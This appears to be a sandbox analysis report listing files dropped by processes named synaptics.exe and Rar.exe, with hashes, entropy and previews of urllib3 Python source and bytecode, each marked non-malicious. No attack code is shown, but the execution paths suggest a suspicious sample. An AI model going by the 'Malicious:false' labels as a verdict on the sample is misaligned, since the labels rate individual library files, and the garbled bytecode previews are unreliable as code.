                                                                                                                                                                                      SHA-512:2B05B9AF717D545239F4C867394432865FD13C80EB84518AB6671FFD29FEF5536FF846E369D672B815102285F093154A39BDEDB31D34AD72F503EB3B1B1E8269
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..from importlib.metadata import version..__all__ = [. "inject_into_urllib3",. "extract_from_urllib3",.]..import typing..orig_HTTPSConnection: typing.Any = None...def inject_into_urllib3() -> None:. # First check if h2 version is valid. h2_version = version("h2"). if not h2_version.startswith("4."):. raise ImportError(. "urllib3 v2 supports h2 version 4.x.x, currently ". f"the 'h2' module is compiled with {h2_version!r}. ". "See: https://github.com/urllib3/urllib3/issues/3290". ).. # Import here to avoid circular dependencies.. from .. import connection as urllib3_connection. from .. import util as urllib3_util. from ..connectionpool import HTTPSConnectionPool. from ..util import ssl_ as urllib3_util_ssl. from .connection import HTTP2Connection.. global orig_HTTPSConnection. orig_HTTPSConnection = urllib3_connection.HTTPSConnection.. HTTPSConnectionPool.ConnectionC
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1404
                                                                                                                                                                                      Entropy (8bit):5.389733870241377
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:LMu6QKYYYH7N9QU4DMU3KZsGfM3yRiR7FXpHW92vbwFWHrb49msQWP7:ABdYLbX4DinRaXRD9Hrb4mAP7
                                                                                                                                                                                      MD5:1590C80DBE3C9FE424FADF48BC409946
                                                                                                                                                                                      SHA1:97E3E3E9B23D6B5EF05FF0941B19F8A3D8DE50E4
                                                                                                                                                                                      SHA-256:FB17FA6AC53BB4BC33C9B03B3F0650DBA4441C1CE3C42DBDDA31A5E61FB47DB7
                                                                                                                                                                                      SHA-512:55CA40A78BCED9B8AC10B8AE092FA3A09E321349A0FA87AE7BFFA9E47986F0C29801FA6A5067CDF717F6EF56232BE6150265E43166F5BECFBB1B3C75C2CC51F3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...sN...U.d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.d.l.Z.d.a.d.e.d.<.d.d.d...Z.d.d.d...Z.d.S.)......)...annotations)...version..inject_into_urllib3..extract_from_urllib3Nz.typing.Any..orig_HTTPSConnection..return..Nonec....................C...s....t.d...}.|...d...s.t.d.|...d.......d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...|.j.a.|.|._.|.|._.d.g.|._.d.g.|._.d.S.).N..h2z.4.zQurllib3 v2 supports h2 version 4.x.x, currently the 'h2' module is compiled with z5. See: https://github.com/urllib3/urllib3/issues/3290.........connection....util....HTTPSConnectionPool....ssl_.....)...HTTP2Connection).r......startswith..ImportError..r....r......connectionpoolr....r....r......HTTPSConnectionr......ConnectionCls..ALPN_PROTOCOLS).Z.h2_version..urllib3_connection..urllib3_utilr......urllib3_util_sslr......r.....HC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\http2\__init__.pyr........s".....................................c....................C...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2538
                                                                                                                                                                                      Entropy (8bit):5.259623122633178
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:kPQG3rPiqRTB08DGmDZrZCYawGQ2bcwf27jpWsI663cv6iuJh6+:kzZ/DGmDZEYaw4bbujpXkSNok+
                                                                                                                                                                                      MD5:D2254B6CEBDA8DF150D456B4742724C6
                                                                                                                                                                                      SHA1:00093CC93F7087A44FDC68C6DBC23C742D1132CA
                                                                                                                                                                                      SHA-256:FF7532641CF5FF3491AADCC77C3E11F2662411B9210EBE209CF54218A1A9A013
                                                                                                                                                                                      SHA-512:4B9E4858A0033E3BF331E18E496AFA7C03EB64E207F954555A8471541FC1F470A7A993C7BF64729F436710FE1DFB3AEE4E0F0A30B852D507CACA74FEE5448004
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...sL...d.d.l.m.Z...d.d.l.Z.G.d.d...d...Z.e...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.d.d.g.Z.d.S.)......)...annotationsNc....................@...sB...e.Z.d.Z.d.Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)..._HTTP2ProbeCache...._lock.._cache_locks.._cache_values..return..Nonec....................C...s....t.....|._.i.|._.i.|._.d.S...N)...threading..Lockr....r....r........self..r.....EC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\http2\probe.py..__init__....s..........z._HTTP2ProbeCache.__init__..host..str..port..int..bool | Nonec....................C...s....d.}.|.j..7..|.|.f.}.z.|.j.|...}.|.d.u.r.|.W.W...d.........S.W.n...t.y4......t.....|.j.|.<.d.|.j.|.<.Y.n.w.W.d.........n.1.s?w.......Y...|.j.|...}.|.......z.|.j.|...}.W.|.S...t.ym..}...z.t.|.t...rdJ...|.........d.}.~.w.w.r....).r....r......KeyErrorr......RLockr......acquire..BaseException..isinstance..release).r....r....r......value..key..key_lock..er....r....r......acquire_and_get....s4..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12668
                                                                                                                                                                                      Entropy (8bit):4.43718269678957
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:7EfnhH8HWnkmgcIutahcTzfmN1d/m/BaTl4DuXm5Ap9g:7E/hTnkYt9ON1wB
                                                                                                                                                                                      MD5:C987555EFD9989FB9505C7520CA9CFD5
                                                                                                                                                                                      SHA1:6E3FC2FE65A2029769C64B0A5447A83EA611BD12
                                                                                                                                                                                      SHA-256:18D969F418C8DC399F48A7B55B46FD22A44178CF10D77C5DD8C03744E709DDD6
                                                                                                                                                                                      SHA-512:585F14458EF6BF78D32595D05D0C535B727675DE53919B78A73679F6CE439C32F7DB47D958EA960FCFECBD74239F7636E4C5581490270ECE12E7123D8F3C73F6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import logging.import re.import threading.import types.import typing..import h2.config # type: ignore[import-untyped].import h2.connection # type: ignore[import-untyped].import h2.events # type: ignore[import-untyped]..from .._base_connection import _TYPE_BODY.from .._collections import HTTPHeaderDict.from ..connection import HTTPSConnection, _get_default_user_agent.from ..exceptions import ConnectionError.from ..response import BaseHTTPResponse..orig_HTTPSConnection = HTTPSConnection..T = typing.TypeVar("T")..log = logging.getLogger(__name__)..RE_IS_LEGAL_HEADER_NAME = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9a-z]+$").RE_IS_ILLEGAL_HEADER_VALUE = re.compile(rb"[\0\x00\x0a\x0d\r\n]|^[ \r\n\t]|[ \r\n\t]$")...def _is_legal_header_name(name: bytes) -> bool:. """. "An implementation that validates fields according to the definitions in Sections. 5.1 and 5.5 of [HTTP] only needs an additional check that field names do not. include uppercase chara
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3014
                                                                                                                                                                                      Entropy (8bit):4.4639831655972575
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:P9KKiM7SQwiqNdlp95feJYNq/qaWF5DX6nE8aawT6WurID:VDiM7SvT5WlcDXbt+m
                                                                                                                                                                                      MD5:F326941F27972957BBE5E005FF30CED2
                                                                                                                                                                                      SHA1:0F3ACBA2EC85A7130D05F77C099DD9440C817E84
                                                                                                                                                                                      SHA-256:9E7024A9B8406A43A217BE6BCFB5B4B9D677F047A1FEE0FC7E357BE0DEF71442
                                                                                                                                                                                      SHA-512:E9F789FF8232103414312EBD3B1833FA4971B9E3052DBCA5E9F308E6C112682F5330A1E7FCFBBC38815A72BA7E72A5E3FBC4789E82A24A4302DAF48EB52C381C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import threading...class _HTTP2ProbeCache:. __slots__ = (. "_lock",. "_cache_locks",. "_cache_values",. ).. def __init__(self) -> None:. self._lock = threading.Lock(). self._cache_locks: dict[tuple[str, int], threading.RLock] = {}. self._cache_values: dict[tuple[str, int], bool | None] = {}.. def acquire_and_get(self, host: str, port: int) -> bool | None:. # By the end of this block we know that. # _cache_[values,locks] is available.. value = None. with self._lock:. key = (host, port). try:. value = self._cache_values[key]. # If it's a known value we return right away.. if value is not None:. return value. except KeyError:. self._cache_locks[key] = threading.RLock(). self._cache_values[key] = None.. # If the value is unknown, we acquire t
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):22913
                                                                                                                                                                                      Entropy (8bit):4.6123699446367254
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:D0Ik4vjqADeNCc61gSm/mTTG7vlT9xp4ArkkW1:gITqADeNClSSUSkt9xp3rkke
                                                                                                                                                                                      MD5:375F776F4F4EA02B00C5C9CBD35A5B9B
                                                                                                                                                                                      SHA1:54ABBE3544898F70A56DE63193402DB34D15ED07
                                                                                                                                                                                      SHA-256:DBF2F6023543828434A819986D7F6EF50AB2535BB9277EF341BB6FFFEB9E6500
                                                                                                                                                                                      SHA-512:115A1404DAA176A02CFA8B8A0E4E54F73058A3EBC6BFC14FDD24A9254783C35AF31659C2C497370881D02965EF4A5FBCEB5FA4843A583F9CE8E82A7EC4453FF0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import functools.import logging.import typing.import warnings.from types import TracebackType.from urllib.parse import urljoin..from ._collections import HTTPHeaderDict, RecentlyUsedContainer.from ._request_methods import RequestMethods.from .connection import ProxyConfig.from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool, port_by_scheme.from .exceptions import (. LocationValueError,. MaxRetryError,. ProxySchemeUnknown,. URLSchemeUnknown,.).from .response import BaseHTTPResponse.from .util.connection import _TYPE_SOCKET_OPTIONS.from .util.proxy import connection_requires_http_tunnel.from .util.retry import Retry.from .util.timeout import Timeout.from .util.url import Url, parse_url..if typing.TYPE_CHECKING:. import ssl.. from typing_extensions import Self..__all__ = ["PoolManager", "ProxyManager", "proxy_from_url"]...log = logging.getLogger(__name__)..SSL_KEYWORDS = (. "key_file",. "cert_file",. "cert_reqs"
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):93
                                                                                                                                                                                      Entropy (8bit):4.327987613540449
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:SqWjty91M9bI+XREqyxReDGrvFlPJc:SjhyDS8mRBkrrJc
                                                                                                                                                                                      MD5:8FB95F1F445D0278380B68C69E7C98D3
                                                                                                                                                                                      SHA1:EF60F75D9814C879E0D3E690DBEC69BDC264B132
                                                                                                                                                                                      SHA-256:51A0AE3C56B71FC5006A46EDFB91BC48F69C95D4CE1AF26FD7CA4F8D42798036
                                                                                                                                                                                      SHA-512:A3ED53FA711BD4F871B3D800C235F63A8510B6F5DBF849987DAA2F92A7F20F09DEA1E055504FC5956BB48E735323A31CBE06E4E0262FBEC0D3A61C5809EDA7E3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Instruct type checkers to look for inline type annotations in this package..# See PEP 561..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):44801
                                                                                                                                                                                      Entropy (8bit):4.340007017499819
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:VK0pBkGlCDIZKGQT2YpJr/YVDMs6u4r07Jo6Zv+1mP1dCzK63z9Q3ONzP7/vtJ:VK0jkGBZKJTZMMs6PM6w4T3b
                                                                                                                                                                                      MD5:9495CDD288D497268526259CC82641D5
                                                                                                                                                                                      SHA1:F3CD98ECB11F95888231A633ACB03125CF14B038
                                                                                                                                                                                      SHA-256:352D2BAB0466B705AD0BFE970EA80324DFEEA3E8C4981573C7457A282B079708
                                                                                                                                                                                      SHA-512:7DCB263E8F06403237604F596C4B7388E3B817CDE4603F1EAC49937980E3116552FCBC0BCE19F1127FDE83C683BF43E0EFCB8D3C0125F43693A4793ED140B3B5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import collections.import io.import json as _json.import logging.import re.import sys.import typing.import warnings.import zlib.from contextlib import contextmanager.from http.client import HTTPMessage as _HttplibHTTPMessage.from http.client import HTTPResponse as _HttplibHTTPResponse.from socket import timeout as SocketTimeout..if typing.TYPE_CHECKING:. from ._base_connection import BaseHTTPConnection..try:. try:. import brotlicffi as brotli # type: ignore[import-not-found]. except ImportError:. import brotli # type: ignore[import-not-found].except ImportError:. brotli = None..try:. import zstandard as zstd.except (AttributeError, ImportError, ValueError): # Defensive:. HAS_ZSTD = False.else:. # The package 'zstandard' added the 'eof' property starting. # in v0.18.0 which we require to ensure a complete and. # valid zstd stream was fed into the ZstdDecoder.. # See: https://github.com/urllib3/urllib3/pul
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1001
                                                                                                                                                                                      Entropy (8bit):4.809819899735385
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:JfEVki9yG/Tfgy2xjGfQs/ukxvth12MrdZrB5c6Qi7QOtzJAAJxj:J8yiQGsXjG4s/ukdo4rB5c7ifR6sj
                                                                                                                                                                                      MD5:C66C1C6F2BAE795547EFF79264441DD4
                                                                                                                                                                                      SHA1:52460D96B307E3CB7DA56A187FC2C4E597DE3C87
                                                                                                                                                                                      SHA-256:FAA792D1071E8AF6B3BC110A0CD142008FBA00271D0CE1384CCBE8ED22CD9404
                                                                                                                                                                                      SHA-512:72FE5CD3872338EF1FA15D077006CED5EB8678A4F2DBD191A9AE8DAC2585E2E41C3EBE2506A8F8F8729E41577E62D21D2F5A1721D41CB9E187A208DFF79D8764
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# For backwards compatibility, provide imports that used to be here..from __future__ import annotations..from .connection import is_connection_dropped.from .request import SKIP_HEADER, SKIPPABLE_HEADERS, make_headers.from .response import is_fp_closed.from .retry import Retry.from .ssl_ import (. ALPN_PROTOCOLS,. IS_PYOPENSSL,. SSLContext,. assert_fingerprint,. create_urllib3_context,. resolve_cert_reqs,. resolve_ssl_version,. ssl_wrap_socket,.).from .timeout import Timeout.from .url import Url, parse_url.from .wait import wait_for_read, wait_for_write..__all__ = (. "IS_PYOPENSSL",. "SSLContext",. "ALPN_PROTOCOLS",. "Retry",. "Timeout",. "Url",. "assert_fingerprint",. "create_urllib3_context",. "is_connection_dropped",. "is_fp_closed",. "parse_url",. "make_headers",. "resolve_cert_reqs",. "resolve_ssl_version",. "ssl_wrap_socket",. "wait_for_read",. "wait_for_write",. "SKIP_HEADER",. "SKIPPABLE_HEADERS",.)
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):947
                                                                                                                                                                                      Entropy (8bit):5.338528519953842
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:cIJUVegJzYoyYhRYQZyihmLptrv2buqq9PXVHL:H3gJz2Y39Zyi0TrOaqq9PN
                                                                                                                                                                                      MD5:424358AB51D1BC6E18F57E16A2F1771A
                                                                                                                                                                                      SHA1:58CC71A09FC9FDE3FE0A25D5066D6657DCB08F33
                                                                                                                                                                                      SHA-256:62AB69EEC845AB6A84A1D61805025FB0482B0D9E99D6CE07240DBD4725013025
                                                                                                                                                                                      SHA-512:B6DAA22E27C43B2D3BC49F16B22A817FD19F0B6F3D4EEE99A99D8ADB65FD40491100C08A5BB6BAFBBC248EBA89B4F58B983B06C103E0AD36FFF62CE19072A343
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.d.S.)......)...annotations.....)...is_connection_dropped)...SKIP_HEADER..SKIPPABLE_HEADERS..make_headers)...is_fp_closed)...Retry)...ALPN_PROTOCOLS..IS_PYOPENSSL..SSLContext..assert_fingerprint..create_urllib3_context..resolve_cert_reqs..resolve_ssl_version..ssl_wrap_socket)...Timeout)...Url..parse_url)...wait_for_read..wait_for_write).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...__future__r......connectionr......requestr....r....r......responser......retryr....Z.ssl_r....r....r....r....r....r....r....r......timeoutr......urlr....r......waitr....r......__all__..r ...r ....GC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\__init__.py..<module>....s..............(.........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3466
                                                                                                                                                                                      Entropy (8bit):5.548630731870598
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:5d8QkXnGs+RA+j7JArpwwSRGR7UAm0DEWStUV5yrIeoYPqr+rb8WTUVHwZJP9+:nkX3+m+hAVwwStdndm5YXiub8WT3ZJI
                                                                                                                                                                                      MD5:B4695B158EC6266D4D8390E989B805FC
                                                                                                                                                                                      SHA1:142F5D17F6742CCDFAE79B719509BF3D500BF061
                                                                                                                                                                                      SHA-256:3F154DDBF869119C1608BF4FFCF3CAE264985FF52257809F5912738D474531A5
                                                                                                                                                                                      SHA-512:B231A5E81286F246F49447AB40E507D2001899D3A8BC22C3365ACB2C631E0B4F9F0A092909C7F3D52A168067296763148515738643A8E15E6D75AE56C398C1B4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..fj........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j.e.j.e.e.e.j.e.e.f...f.....Z.e.j.r5d.d.l.m.Z...d&d.d...Z.e.d.d.f.d'd.d...Z.d(d.d...Z.d)d.d ..Z.d*d#d$..Z.e.d%..Z.d.S.)+.....)...annotationsN.....)...LocationParseError.....)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...BaseHTTPConnection..connr......return..boolc....................C...s....|.j...S.).z.. Returns True if the connection is dropped and should be closed.. :param conn: :class:`urllib3.connection.HTTPConnection` object.. )...is_connected).r......r.....IC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\connection.py..is_connection_dropped....s......r......address..tuple[str, int]..timeoutr......source_address..tuple[str, int] | None..socket_options.._TYPE_SOCKET_OPTIONS | None..socket.socketc....................C...s$...|.\.}.}.|...d...r.|...d...}.d.}.t...}.z.|...d.....W.n...t.y*......t.d.|...d.....d...w.t...|.|.|.t.j...D.]O}.|.\.}.}.}.}.}.d.}.z(t...|.|.|...}.t.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1077
                                                                                                                                                                                      Entropy (8bit):5.403816031998314
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:V/ZpGf5n/lIpWt84RzmQXvAFnT8adLRbpH7frY8lt6rn:Vut/Rt82m38apbf7S
                                                                                                                                                                                      MD5:89B8E3BD7EA958F102981CF9700291E5
                                                                                                                                                                                      SHA1:B919C52800EA48EC1E2D6059E8688DF8F82B6A25
                                                                                                                                                                                      SHA-256:BD8D7612D207CC4D48B9705DBE325CA4EF8780DB313F90400BD4EEB951D6CF1C
                                                                                                                                                                                      SHA-512:F3D5D29E9F2BB1D9EF378F525B90B65CEF40B81E000A70DE839F952F49E9F639C0D66DCA277C259BECB56A2CEE2583DD7B267F2E846BD06F61AF81A386CFD830
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f|........................@...sH...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...e.j.r.d.d.l.m.Z.........d.d.d.d...Z.d.S.)......)...annotationsN.....)...Url.....)...ProxyConfig..proxy_url..Url | None..proxy_config..ProxyConfig | None..destination_scheme..str | None..return..boolc....................C...s4...|.d.u.r.d.S.|.d.k.r.d.S.|.j.d.k.r.|.r.|.j.r.d.S.d.S.).a?.... Returns True if the connection requires an HTTP CONNECT through the proxy... :param URL proxy_url:. URL of the proxy.. :param ProxyConfig proxy_config:. Proxy configuration from poolmanager.py. :param str destination_scheme:. The scheme of the destination. (i.e https, http, etc). NF..http..httpsT)...scheme..use_forwarding_for_https).r....r....r......r.....DC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\proxy.py..connection_requires_http_tunnel....s..........................r....).NNN).r....r....r....r....r....r....r....r....)...__future__r......typing..urlr......TYPE_CHECKING..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6201
                                                                                                                                                                                      Entropy (8bit):5.645657954132128
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Rj+t5DiDKV+DKYzQ2P7fRxa5jyGyT/aOMyjxMbsrHMCtkwTVvAJhK:EyKV+DKYzP7pxdCsxM4H/T5
                                                                                                                                                                                      MD5:768DA1FD967B1B2A551B8DFB642A91BD
                                                                                                                                                                                      SHA1:FA5C08C88A1670F319EC0BC3A6708E9B96806DC5
                                                                                                                                                                                      SHA-256:B9E80DCD48BC622E27463FA64FD801320077FDAFA6D0ECE221CD6542176E06F9
                                                                                                                                                                                      SHA-512:D5EAB6C071D39127DDB4F60AE3932E0199FCC8FAB1DEC8EEAC0F5D17A4314AB5D0E1D52A6596DFC221038FF054DB91B5300F95BE786DEBBC1C9A36E68BAB5936
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...sd...U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r0d.d.l.m.Z...d.Z.e.g.d.....Z.d.Z.z.z.d.d.l.Z.W.n...e.yN......d.d.l.Z.Y.n.w.W.n...e.yY......Y.n.w.e.d.7.Z.z.d.d.l.Z.W.n...e.ym......Y.n.w.e.d.7.Z.G.d.d...d.e...Z.e.j.Z.d.e.d.<.e.j.e.e.f...Z.h.d...Z.............d6d7d.d ..Z d8d%d&..Z!d9d+d,..Z"G.d-d...d.e.j#..Z$d:d4d5..Z%d.S.);.....)...annotationsN)...b64encode)...Enum.....)...UnrewindableBodyError.....)...to_bytes)...Finalz.@@@SKIP_HEADER@@@)...accept-encoding..host..user-agentz.gzip,deflatez.,brz.,zstdc....................@...s....e.Z.d.Z.d.Z.d.S.)..._TYPE_FAILEDTELLr....N)...__name__..__module__..__qualname__..token..r....r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\request.pyr....'...s........r....z.Final[_TYPE_FAILEDTELL].._FAILEDTELL>....Z.CONNECTZ.DELETE..HEADZ.TRACEZ.OPTIONS..GET..keep_alive..bool | None..accept_encoding..bool | list[str] | str | None..user_agent..str | None..basic_
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2333
                                                                                                                                                                                      Entropy (8bit):5.382572800996394
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:Cmhh16zJQ+Nk7gkL2YMHhfpm7kmpx6nriZEviRo3C:p6zGslvhaIds
                                                                                                                                                                                      MD5:4F5A13A1D17878BAD785726FAB32B4CB
                                                                                                                                                                                      SHA1:513C6B187C8B4144D3CFF386752037A61AE07394
                                                                                                                                                                                      SHA-256:CFF30FA5DA11ACD82F0F6CE182CEB700DEC0631D40E10860E17D2853AEE83D81
                                                                                                                                                                                      SHA-512:780F372F388BC2BE3CB84B4FB8E48C6CF6B3D322AEB3958F7AB616786C8DA3ABA417614AF14E1311DFD5F41F6E8935DBB23E8F63B91314A340BF921EB184B9A2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...sV...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)......)...annotationsN)..!MultipartInvariantViolationDefect..StartBoundaryNotFoundDefect.....)...HeaderParsingError..obj..object..return..boolc....................C...s`...z.|.....W.S...t.y.......Y.n.w.z.|.j.W.S...t.y.......Y.n.w.z.|.j.d.u.W.S...t.y/......Y.t.d.....w.).zt. Checks whether a given file-like object is closed... :param obj:. The file-like object to check.. Nz)Unable to determine whether fp is closed.)...isclosed..AttributeError..closed..fp..ValueError).r......r.....GC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\response.py..is_fp_closed....s ...................................r......headers..httplib.HTTPMessage..Nonec....................C...sn...t.|.t.j...s.t.d.t.|.....d.......d.}.|.....s#|.....}.t.|.t.t.f...r#|.}.d.d...|.j.D...}.|.s/|.r5t.|.|.d.....d.S.).a>.... Asserts whether all headers have been successful
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15746
                                                                                                                                                                                      Entropy (8bit):5.362946859038454
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:0f/Qj12FuuccXjtRLJIkyuhvCF4+W8THjSbG9JJb2s5297Y:09suPVJvCOWDsG97297Y
                                                                                                                                                                                      MD5:2992303387474E39D65AC07FF91F0C3F
                                                                                                                                                                                      SHA1:D33EB39E206EBA6ECD50AA829544907EE5D34704
                                                                                                                                                                                      SHA-256:A1DA0AB0D791099B196DAEB816A7B2D738C476E8D46EE03A0F30A56B2875BBC1
                                                                                                                                                                                      SHA-512:615215A3C502F35C39C909CF775AC6A6BD26015B49B23E6D0D52E826CC0E60B4768CB8EF703BD32E45C350337919CE00C2B1F25E4E1DEA899548BFD55345A4CF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.H.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.j.rWd.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...e...Z.G.d.d...d.e.j ..Z!G.d.d...d...Z"e"d...e"_#d.S.)......)...annotationsN)...takewhile)...TracebackType.....)...ConnectTimeoutError..InvalidHeader..MaxRetryError..ProtocolError..ProxyError..ReadTimeoutError..ResponseError.....)...reraise)...Self)...ConnectionPool)...BaseHTTPResponsec....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...RequestHistory..str | None..method..url..Exception | None..error..int | None..status..redirect_locationN)...__name__..__module__..__qualname__..__annotations__..r....r.....DC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\util\retry.pyr....!...s................r....c....................@...s"...e.Z.d.Z.U.d.Z.e.g.d.....Z.e.g.d.....Z.e.g.d.....Z.d.Z.d.e.d.<.d.d.d.d.d.d.e.d.d.e.d.d.d.d.e.d.f.dbd'd
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
